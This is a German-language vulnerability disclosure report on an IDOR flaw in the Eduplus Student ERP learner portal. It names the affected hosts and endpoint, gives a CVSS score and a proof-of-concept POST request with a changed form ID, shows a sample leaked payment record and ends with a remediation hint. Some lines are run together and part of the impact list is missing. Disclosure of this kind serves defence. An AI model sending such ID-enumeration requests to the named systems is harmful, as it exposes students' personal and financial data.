
# Detaillierter Schwachstellenforschungsbericht über eine IDOR in Eduplus Student ERP, einschließlich technischer Analyse, PoC, Auswirkungsbewertung und Empfehlungen zur Behebung.
Forscher: Vinay Sharma
Dieser Bericht beschreibt eine Sicherheitslücke mit hohem Schweregrad, die in der Eduplus-Studenten-ERP-Plattform identifiziert wurde, insbesondere im Studenten-Lernportal (learnerapi.pceterp.in). Die Anwendung weist eine Universelle Unsichere direkte Objektreferenz (IDOR) am Endpunkt für die Prüfungsformular-Einreichung auf, die es jedem authentifizierten Benutzer (Studenten) ermöglicht, die sensiblen persönlichen und finanziellen Daten jedes anderen Studenten durch Manipulation von Formular-IDs abzurufen.
Die Schwachstellen ermöglichen eine groß angelegte Datenerfassung von Studentendatensätzen, einschließlich personenbezogener Daten (PII) und detaillierter Prüfpfade für Finanztransaktionen.
learnerapi.pceterp.in, learner.zealerp.in, usw.learner.despu.edu.inPOST /ExamForm/viewSubmitExamFormCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)Die Schwachstelle befindet sich im Endpunkt viewSubmitExamForm. Der Server verlässt sich auf zwei vom Client bereitgestellte Parameter, um den abzurufenden Datensatz zu identifizieren:
{"formid": "XXXXX"}Router-Path: /view-pcu-exam-form/XXXXXformid verknüpften Daten einzusehen. Durch das Durchlaufen numerischer IDs kann ein Angreifer auf die Datensätze anderer Studenten zugreifen.Eine standardmäßige POST-Anfrage an den verwundbaren Endpunkt mit einer modifizierten formid liefert sensible Studentendaten.
Anfrage:
POST /ExamForm/viewSubmitExamForm HTTP/2
Host: learnerapi.pceterp.in
Content-Type: application/json
Router-Path: /view-pcu-exam-form/28984
... (Authentifizierte Header) ...
{"formid":"28984"}
Antwort (Zusammenfassung der geleakten Daten):
{
"status": "200",
"examFormname": "B.Tech - Sem VI - Regular",
"receipt_no": "REC/2023/54321",
"feespaiddate": "2023-10-15",
"ispaymentdone": {
"username": "[email protected]",
"received_amount": "1500.0",
"updation_ip_address": "103.x.x.x",
"erp_transaction_id": "ERP_998877",
"bank_transaction_id": "BANK_ABC123",
"paymentgateway_transaction_id": "PG_XYZ789",
"learner": {
"id": "12345"
}
}
}





Hochladen von Idorpoc.mp4…
Die erfolgreiche Ausnutzung dieser Schwachstelle ermöglicht Folgendes:
formid zu der learnerid gehört, die mit der aktiven Sitzung verknüpft ist. Vertrauen Sie den Parametern formid oder Router-Path niemals ohne Validierung gegen das authentifizierte Sitzungstoken.